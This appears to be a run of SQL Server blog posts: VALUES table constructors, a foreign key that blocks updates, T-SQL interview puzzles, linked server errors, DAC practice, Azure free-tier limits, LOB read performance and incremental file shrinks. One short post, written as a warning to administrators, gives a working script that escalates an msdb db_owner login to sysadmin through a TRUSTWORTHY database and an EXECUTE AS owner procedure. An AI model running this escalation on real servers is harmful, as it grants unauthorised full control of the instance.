This has come up a few times recently. I find it rather fascinating and I can never seem to remember how to do it properly … so in other words, it’s a perfect subject for a blog post.

Basically, you can use VALUES to create a table within a query. I’ve seen it done in a number of places. Mostly when demoing something and you want some data, but don’t want to actually create a table. I’ve also seen it used to create a numbers table, create test data, etc. Really, any case where you want a short list of values but don’t want to create an actual (or even temp) table to store them. Something like this:

SELECT Nums.[Values]
FROM (VALUES (1),(2),(3),(4),(5)) Nums([Values]);

You can also, of course, use it to create a multi-column table.

SELECT Data.FName, Data.LName, Data.BDate
FROM (VALUES ('Bob','Smith','1/1/2000'),
			('Jane','Doe','10/4/2000'),
			('Dr','Who',NULL)) Data(FName, LName, BDate);

Now, here’s where this gets interesting. That table makes some assumptions. Just because I called the 3rd column a date doesn’t mean it is one. In fact, it’s a varchar like the other two columns. That’s kind of important if you decide to do anything with that column. Where an implicit conversion is possible you’ll get one, and sometimes you’ll just get an error.

SELECT Data.FName, Data.LName, Data.BDate+1
FROM (VALUES ('Bob','Smith','1/1/2000'),
			('Jane','Doe','10/4/2000'),
			('Dr','Who',NULL)) Data(FName, LName, BDate);

Msg 245, Level 16, State 1, Line 4
Conversion failed when converting the varchar value ‘1/1/2000’ to data type int.

To fix that you’ll want to make sure that SQL knows what the datatype is actually supposed to be. There may be other ways to do this, but I’ve found that if you do an explicit conversion on the column in the first row it will fix the datatype for the entire table.

SELECT Data.FName, Data.LName, Data.BDate+1
FROM (VALUES ('Bob','Smith',CAST('1/1/2000' AS DateTime)),
			('Jane','Doe','10/4/2000'),
			('Dr','Who',NULL)) Data(FName, LName, BDate);

These types of things can get particularly interesting if you start combining them together.

SELECT First.Name, Last.Name
FROM (VALUES ('Bob'), ('Jane'), ('Dr')) First(Name)
CROSS JOIN (VALUES ('Smith'), ('Doe'), ('Who')) Last(Name);

Don’t forget that at the end of the list of values you have to give your table, and each of its columns, a name so you have something to reference throughout the rest of the query.

(VALUES ('col1','col2'), -- Row1
	('col1','col2'), -- Row2
	('col1','col2') -- Row3 etc
	) TableName(Column1Name, Column2Name)

When I decided to rip off Brent Ozar’s (b/t) Bad Idea Jeans series (yes, I asked) I figured that since I live in Texas it would be a cowboy hat (now I need to go buy one I guess). So, putting on my imaginary cowboy hat, here is one of the strangest things I’ve seen or come up with in years.

I have to admit, this one wasn’t my idea. But the other day I saw a pair of tables with identical data and a foreign key between them. Which seemed a little weird. Why two identical tables? Why a foreign key between them?

It got weirder. The tables were of the format (id, description, value). The foreign key was on those last two columns. Normally you use a foreign key to maintain referential integrity: make sure that the values in ColumnA exist in TableB. In this case though, since they included the value column, it has a strange (side?) effect. You can’t update those columns.

Quick demo because I find they explain things far better than I ever can.

-- Setup code

USE Test;
GO

CREATE TABLE Table1 (
	ID INT NOT NULL IDENTITY(1,1)
	, Descrip varchar(50)
	, Val varchar(50)
	, CONSTRAINT pk_Table1 PRIMARY KEY (Descrip, Val)
	);

CREATE TABLE Table2 (
	ID INT NOT NULL IDENTITY(1,1)
	, Descrip varchar(50)
	, Val varchar(50)
	, CONSTRAINT pk_Table2 PRIMARY KEY (Descrip, Val)
	, CONSTRAINT fk_Table2_Table1 FOREIGN KEY (Descrip, Val)
		REFERENCES Table1 (Descrip, Val)
	);

INSERT INTO Table1 VALUES 
	('Property1','Value1')
	,('Property2', 'Value2')
	,('Property3', 'Value3')
	,('Property4', 'Value4')
	,('Property5', 'Value5');

INSERT INTO Table2 VALUES
	('Property1','Value1')
	,('Property2', 'Value2')
	,('Property3', 'Value3')
	,('Property4', 'Value4')
	,('Property5', 'Value5');

So obviously inserts work (as long as you do them in the right order), but how about updates?

UPDATE Table1 SET Val = 'NewValue'
	WHERE Descrip = 'Property1';

UPDATE Table2 SET Val = 'NewValue'
	WHERE Descrip = 'Property1';

Msg 547, Level 16, State 0, Line 39
The UPDATE statement conflicted with the REFERENCE constraint “fk_Table2_Table1”. The conflict occurred in database “Test”, table “dbo.Table2”.
The statement has been terminated.
Msg 547, Level 16, State 0, Line 42
The UPDATE statement conflicted with the FOREIGN KEY constraint “fk_Table2_Table1”. The conflict occurred in database “Test”, table “dbo.Table1”.
The statement has been terminated.

I’ll be honest, I have no idea why you would do this. At this point, the only way to update the data is to remove the foreign key, update, and add it back again. Or wipe out the rows (in the right table order of course) and add them back again.
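Using the demo tables above, the workaround looks something like this:

```sql
-- Drop the foreign key, update both tables, then put the key back.
ALTER TABLE Table2 DROP CONSTRAINT fk_Table2_Table1;

UPDATE Table1 SET Val = 'NewValue' WHERE Descrip = 'Property1';
UPDATE Table2 SET Val = 'NewValue' WHERE Descrip = 'Property1';

ALTER TABLE Table2 ADD CONSTRAINT fk_Table2_Table1
	FOREIGN KEY (Descrip, Val) REFERENCES Table1 (Descrip, Val);
```

Hardly convenient, which is rather the point.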

If you really don’t want people to update a table don’t grant the permissions. Or if you are really desperate:

DENY UPDATE ON Table1 TO MyUser;

Note: If you want to hit everyone you can always do the DENY on the public role. Well, everyone but dbo and members of sysadmin.
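Using the demo table above, that version looks like this:

```sql
-- Everyone except dbo and members of sysadmin is blocked from updating.
DENY UPDATE ON Table1 TO public;
```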

This year PASS is trying something new at PASS Summit. There are going to be Learning Pathways. A learning pathway is at least three sessions on a single subject that will get you started on a new (or update an old) skill. And I’ll be taking part in the Security Learning Pathway!

First let me say wish me luck. I’ve spoken a number of times before (don’t ask me what number, I haven’t kept track but it’s probably in the high single or low double digits) but each and every time I feel like I can use all the luck I can get.

This is my second time speaking at the Summit. Last time was in 2015 and I have to tell you, it was pretty cool. I’ve always felt like getting to speak is like getting to sit at the big kid’s table. Speaking at Summit is 10x that. I mean there are always some pretty amazing speakers there.

I’ll be giving my SQL Server Security from the Ground Up session. It’s a pretty good one if I do say so myself. I make no assumptions about your security knowledge and get you to where you can at least handle the basics of securing a SQL Server. After my session, there are 3 more.

  1. How I Would Attack SQL Server
  2. Capturing SQL Server Activity with SQL Server Audit
  3. Six Ways to Improve SQL Server Application Security

 
As you can see, these sessions, along with mine, make a great progression from minimal security knowledge to a pretty solid start at protecting a SQL Server instance.

Some of the other pathways include Cloud Migration, Technical Leadership, Modernizing with SQL 2019, Linux for SQL Server Professionals, etc. I have to admit there are several of these that I’m really excited about trying out. Can’t wait to see y’all there!

It’s TSQL Tuesday and Matthew McGiffen (b/t) is our host with a subject near and dear to my heart. Puzzles! Thanks for coming up with this great subject Matt!

As Matt mentioned, puzzles are something I do anyway. In fact, I have a whole page of puzzles and other fun things to do. Since I had done so many crosswords and other types of things, I decided this time I would do a more traditional SQL puzzle. As I thought about what to write, I remembered a couple of puzzles I had been given during some interviews. Now, SQL has improved quite a bit since I was given these, so we are going to need a few rules.

Pagination

The year is 2004. You’re taking a tech test as an interview for a SQL development job. They have a page in their application that displays up to 20 rows of information. They need a piece of code that will return the rows from a given page. Oh, and it may not always be 20 rows per page. You need to write a piece of code where they can pass in a page number and page size and get back results. So for example, if the page size is 20 and the page is 3 then you need to return back rows 41 to 60.

Requirements

  • Return a page of information from spt_values.
  • Order is by the column name.
  • There must be a variable or parameter for page number and one for page size.
  • No windowing functions. No OFFSET/FETCH, no ROW_NUMBER(). This is 2004; they don’t exist yet.
  • The last page is, of course, just however many rows are left. So in the example above, if there are only 55 rows total, the 3rd page returns 15 rows.
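Spoiler warning: if you want a hint, one classic pre-windowing-function approach is nested TOPs, reversing the sort to peel off the last page-worth of rows. A rough sketch (note that TOP (@variable) is itself a 2005 feature; on SQL 2000 you’d use SET ROWCOUNT instead):

```sql
DECLARE @PageNum int = 3, @PageSize int = 20;

-- Take the first @PageNum * @PageSize rows, reverse the sort to grab
-- the last @PageSize of those, then flip them back into order.
SELECT PageRows.name, PageRows.number
FROM (SELECT TOP (@PageSize) FirstRows.name, FirstRows.number
	FROM (SELECT TOP (@PageNum * @PageSize) name, number
			FROM master.dbo.spt_values
			ORDER BY name) FirstRows
	ORDER BY FirstRows.name DESC) PageRows
ORDER BY PageRows.name;
```
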
Dates and times to numbers and back

It’s a few years later and you are looking for a job again. This time you are given an actual request from a client. It’s one they’ve already solved, but they want to see how you would do it. A piece of it (and one of the harder bits at that) is the fact that they are storing their datetime data as two integers. So the datetime ‘5/14/2019 8:00AM’ would be two integers: 20190514 and 80000. And ’12/4/2019 00:00:02’ would be 20191204 and 2.

Requirements

Given the table below, combine the two integers back into a datetime value.

CREATE TABLE DateTime_Ints (int_date int, int_time int);
INSERT INTO DateTime_Ints
SELECT CONVERT(int, CONVERT(varchar,MyDate,112)),
		CONVERT(int, REPLACE(CONVERT(varchar,MyDate,8),':',''))
FROM (VALUES (CAST('1/1/1960 12:00:00' AS DATETIME)), ('12/5/1981 00:00:04'),
			('5/30/1963 22:14:30'), ('8/17/2001 00:20:10'),
			('10/31/2008 9:00:00'), ('11/2/2019 04:00:13'),
			('2/25/1983 00:09:04'), ('1/21/2000 19:30:00'),
			('4/12/2010 10:10:10'), ('4/4/2004 04:04:04')
	) AS DateList(MyDate);

Remember that this is pre-2008, so no DATE or TIME datatypes.
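Spoiler warning again. One possible approach: convert each integer back into a string that CONVERT already understands (styles 112 and 108), padding the time back out to six digits first:

```sql
-- 20190514 and 80000 come back out as '2019-05-14 08:00:00.000'.
SELECT CONVERT(datetime, CONVERT(varchar(8), int_date), 112)
	+ CONVERT(datetime,
		STUFF(STUFF(RIGHT('000000' + CONVERT(varchar(6), int_time), 6),
			5, 0, ':'), 3, 0, ':'), 108) AS MyDate
FROM DateTime_Ints;
```

Adding two datetimes works here because a time-only datetime is just an offset from the 1900-01-01 base date.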

And if these are too easy, or you are just having fun, pick one of the newer commands (STRING_AGG is a really popular one for this) and figure out how the same task was done before that command became available.
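For instance, before STRING_AGG arrived in 2017, the standard workaround was FOR XML PATH('') plus STUFF to trim the leading delimiter. A quick sketch using a VALUES table like the ones above:

```sql
-- Concatenate a comma separated list the pre-2017 way.
SELECT STUFF((
	SELECT ',' + FName
	FROM (VALUES ('Bob'),('Jane'),('Dr')) Data(FName)
	FOR XML PATH('')
	), 1, 1, '') AS NameList;
-- vs the 2017+ version: SELECT STRING_AGG(FName, ',') ...
```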

If you have to deal with linked servers then you probably have or will run into the following error:

Login failed for user ‘NT AUTHORITY\ANONYMOUS LOGON’

But I’m not trying to use the linked server. I’m trying to create/alter a stored procedure.

Yea, but when you do that, if a linked server is referenced in the code, the parser(?) is going to go out and check whether the objects you are referencing exist. In fact, you can run into any number of different linked server errors, not just this one.

So what do I do?

Simply put, whatever account you are using to do the create/alter has to be able to check across the linked server. Note: this could be any type of code; it doesn’t have to be a stored procedure, it could be a function or whatever. The solution is going to depend somewhat on what position you are in.

  • Kerberos is working, but you don’t have access to the linked server.
    Get access either through your account or possibly a SQL Server Id, or have someone who has access do the work. I have on occasion set up a new SQL Id on both sides of the linked server and then logged in as that to create/modify the SP. Then I remove those IDs. But then again, I’m a sysadmin with a lot of experience scripting the creation of SQL Ids.
  • Kerberos isn’t set up because you are using SQL Ids
    See above and please reconsider your life choices
  • Kerberos is set up but broken
    Fix Kerberos. This will take longer but if Kerberos isn’t working you aren’t going to be able to run the stored procedure anyway.
  • The linked server is broken for some reason other than Kerberos.
    Again, see above.
SQL Studies by Kenneth Fisher - 2w ago

This doesn’t require much in the way of discussion. This isn’t exactly a huge issue since I don’t think granting db_owner in msdb happens a whole lot, but still. Consider yourself warned.

I should add, this will work on any database that has TRUSTWORTHY turned on where the dbo is a sysadmin. Oh, and my understanding is that msdb needs both: an owner that is a sysadmin (sa) and TRUSTWORTHY turned on.

CREATE LOGIN ImpersonationTest WITH PASSWORD ='test', CHECK_POLICY = OFF;
GO
USE msdb
GO
CREATE USER ImpersonationTest FROM LOGIN ImpersonationTest;
GO
ALTER ROLE db_owner ADD MEMBER ImpersonationTest;
GO

Connect as ImpersonationTest

USE msdb
GO
CREATE PROCEDURE dbo.sysadminMe 
WITH EXECUTE AS owner
AS
ALTER SERVER ROLE sysadmin ADD MEMBER ImpersonationTest;
GO
EXEC dbo.sysadminMe;
GO
SELECT * FROM sys.login_token;

Yes, it’s that time again. Time to do your homework. This month your homework is to set up the DAC (dedicated admin connection) for remote access and practice with it using SQLCMD.

For those of you that don’t know, the DAC is a single-user connection with a dedicated set of resources. What this means is that when your instance is sluggish, or even unresponsive, the DAC may very well be able to connect and you can run diagnostic queries and possibly even fix things. However, in order to do that you need practice!

  • Turn on remote DAC connections.
  • Learn why SSMS can be somewhat problematic when using the DAC.
  • Use SQLCMD to connect using the DAC.
  • Run a few diagnostic queries.
    • What’s trying to run right now?
    • What’s the memory usage on the instance?
    • What queries are using the most memory?
    • Same with CPU.
    • Anything else you can think of.
  • In another session check what session has the DAC open and who’s doing it. (You’d be surprised but I’ve seen people open the DAC for no particular reason.)
I want to point out that this one is particularly important. You won’t use the DAC often but if you need it your instance probably has some pretty significant issues. Given that it’s a single connection you won’t be able to use a lot of the tools you are used to. For most of us, this is going to require practice. Possibly a lot of it. And you really don’t want to take time to practice while your users are screaming about an outage.
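To get you started, here’s a rough sketch of the setup and a couple of the checks (the server name is a placeholder; run the diagnostic queries from the connected session):

```sql
-- Turn on remote DAC connections (locally the DAC already works).
EXEC sp_configure 'remote admin connections', 1;
RECONFIGURE;

-- From a command prompt, connect with sqlcmd using the -A (admin) switch:
--   sqlcmd -S MyServer -E -A

-- What's trying to run right now?
SELECT session_id, status, command, wait_type, blocking_session_id
FROM sys.dm_exec_requests;

-- Who has the DAC open? (Run this from another session.)
SELECT s.session_id, s.login_name, s.login_time
FROM sys.dm_exec_sessions s
JOIN sys.endpoints e ON s.endpoint_id = e.endpoint_id
WHERE e.name = 'Dedicated Admin Connection';
```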

The first thing I want to do is say thank you to Michael Crump (b/t). He tweeted out this:

What do you get with a Free account in #Azure?

-A LOT-

750 Hours of #VMs
250 GB of #SQL db
5GB of @AzureCosmosDB
1 million requests with @AzureFunctions
5 users free w/ @AzureDevOps
100 modules of ML
more – https://t.co/MEFWqGbXg1 https://t.co/Qj7MdIt4qW

— Michael Crump (@mbcrump) April 10, 2019

A while back I talked about getting started with Azure. At the time you got a year of $25 a month credit. This is no longer the case, but that’s all to the better. I mean, look at that list of benefits! Michael wasn’t kidding. It’s -A LOT-.

For 1 month

  • $200 credit

For 12 months

  • 750 hours each of Windows and Linux virtual machines.
  • Two 64GB managed disks.
  • 5GB blob storage.
  • 5GB file storage.
  • 250GB SQL Database.
  • 5GB Azure Cosmos DB.
  • 15GB bandwidth.

Always free

  • 10 Web, mobile, or API apps.
  • Functions: 1,000,000 requests per month.
  • Event Grid: 100,000 operations per month.
  • Azure Kubernetes Service: Free.
  • Face API: 30,000 transactions per month.
  • DevTest Labs: Free.
  • Active Directory B2C: 50,000 monthly stored users.
  • Service Fabric: Free.
  • Azure DevOps: 5 users with unlimited private Git repos.

Wow, this is a long list. If you want to read the rest of it you should follow this link to create your free Azure account. Oh, and SQL Server Developer edition is on the list too. No idea why since it’s not an Azure product. But hey, free!

This gives you 12 months to really dig into Azure without having to spend much if anything. This is a huge, if temporary, boost to your home lab. Just the free VMs alone means you can create a cluster and start playing with availability groups. Or a single VM and practice installing SQL. Or create an Azure SQL DB. Or, well, really almost anything.

Given how quickly things are changing I’d get started!

I was asked the other day why a customer was having performance issues on a table. A simple SELECT that only returns 1134 rows was taking over a minute!

I did some looking because that sounds really odd. I mean, that’s a LOT of time for just over a thousand rows. Ok, so I checked the server speed, drive speed, anything blocking, wait stats, etc. All the usual suspects. No luck. Then I checked the table size:

exec sp_spaceused [TableName];

That’s a pretty big table for the number of rows. Particularly given that it’s all data and almost no index. Ok, let’s look at the time/io breakdown:

SET STATISTICS TIME, IO ON

SELECT [Col1], [Col2], [Col3], [Col4], [Col5]
      ,[Col6], [Col7], [Col8], [Col9], [Col10]
  FROM [dbo].[TableName]
GO

SQL Server parse and compile time:
CPU time = 0 ms, elapsed time = 0 ms.

(1134 rows affected)
Table ‘TableName’. Scan count 1, logical reads 182, physical reads 0, read-ahead reads 0, lob logical reads 53742, lob physical reads 18, lob read-ahead reads 27384.

SQL Server Execution Times:
CPU time = 172 ms, elapsed time = 69110 ms.

Hmm, 182 logical reads. Not a whole lot. But wait: lob logical reads 53742, lob physical reads 18, lob read-ahead reads 27384. That’s a total of 81144 lob reads. A fair amount. In case you weren’t aware, lob stands for large object. Lob pages hold things like varchar(max), nvarchar(max), filestream, xml and varbinary(max) data. Not all of that data will be in a lob page. For example, my understanding is that if you use a varchar(max) to store 15 bytes it will still be stored in the normal data page. It’s only when it no longer fits that it gets pushed to a lob page. Either way, I looked over the data types for the table. There were some INTs, VARCHARs, a couple of DATETIMEs and an XML.

An XML. Ok, let’s try this differently.

SET STATISTICS TIME, IO ON

SELECT [Col1], [Col2], [Col3], [Col4], [Col5]
      ,[Col6], [Col7], [Col8], [Col9] /*, [Col10] */
  FROM [dbo].[TableName]
GO

SQL Server parse and compile time:
CPU time = 0 ms, elapsed time = 0 ms.

(1134 rows affected)
Table ‘TableName’. Scan count 1, logical reads 181, physical reads 0, read-ahead reads 0, lob logical reads 0, lob physical reads 0, lob read-ahead reads 0.

SQL Server Execution Times:
CPU time = 0 ms, elapsed time = 129 ms.

Well, look at that. One less logical read, no lob reads, and it took all of 129 ms. That’s roughly 536 times faster.

This prompted a quick conversation with the client.

Me: Do you really need to pull that XML column every time you run the query?
Client: Well, we need to keep it. We need that data.
Me: I get that. But when you query all the rows, do you need the XML for all of them at the same time? Or do you look at the basic info in a grid, scroll through it, and then bring up a single detail page with the XML for just that one row?
Client: Oh yea. That’s exactly what we do.

So yes, not pulling a single column that wasn’t needed most of the time, on a tiny, tiny table, made a huge difference. Only pull the data you need, people. SELECT * is a really bad habit, and even in this case, where they were pulling the columns by name, they still needed to pay attention and only pull the columns they were actually going to use.

Yes, I realize you shouldn’t shrink your database (data files or log files), but I recently had a case where it was completely appropriate to do a shrink. We had a table that was almost a terabyte on its own. It was decided to put in an archive process that got rid of 3/4 of the table. This left us with ~750GB of empty space. The total DB size was ~1.25TB, so this was going to more than cut it in half.

We needed that space for other things, so it was time to shrink the database. Now, you can work in the database while it’s being shrunk, but it’s not something I would do on a busy production system. Shrink is also pretty slow. In this case, I expected it could take quite a bit of time. Maybe not days, but maybe 10-20 hours. Unfortunately, I didn’t have that much time. This particular system has an outage window/slow time of a few hours a day. So what could I do?

Well, there are a few thoughts/tips.

  • First of all, I like to target my shrinks by using DBCC SHRINKFILE instead of DBCC SHRINKDATABASE. In this particular case, I only had one file (of 10) that needed to be shrunk. No point in hitting the entire database when a single file will do.
  • Both SHRINKDATABASE and SHRINKFILE have a TRUNCATEONLY option. It’s pretty quick (a few seconds to a minute usually) and doesn’t actually move any pages around. All it does is go out to the very last page in use and get rid of all of the empty space after that. So for example, in my case using TRUNCATEONLY almost immediately got rid of ~200GB. It didn’t fix things, but it provided some much-needed space on the drive.
  • You can move tables from one filegroup to another. You could potentially move each table to a different filegroup and then truncate the file(s) in the original filegroup, or even empty them out and get rid of the filegroup entirely.
  • This is a very important part of the BOL entry:

    You can stop DBCC SHRINKFILE operations at any point and any completed work is preserved.

    You can run the shrink for an hour or two a day and eventually it will finish! This is what I ended up doing. It took a bit over 2 weeks of running the shrink every day from 1-3 hours a day, but it got there.
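Putting those tips together, a sketch of what each day’s window looked like (the file name and target size are made up for the example):

```sql
-- Quick win first: release the empty space past the last used page.
DBCC SHRINKFILE (N'MyDataFile', TRUNCATEONLY);

-- Then the real shrink, targeting just the one file. Target size is in MB.
-- Run it for an hour or two, cancel it, and pick it back up tomorrow;
-- completed work is preserved.
DBCC SHRINKFILE (N'MyDataFile', 512000);
```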
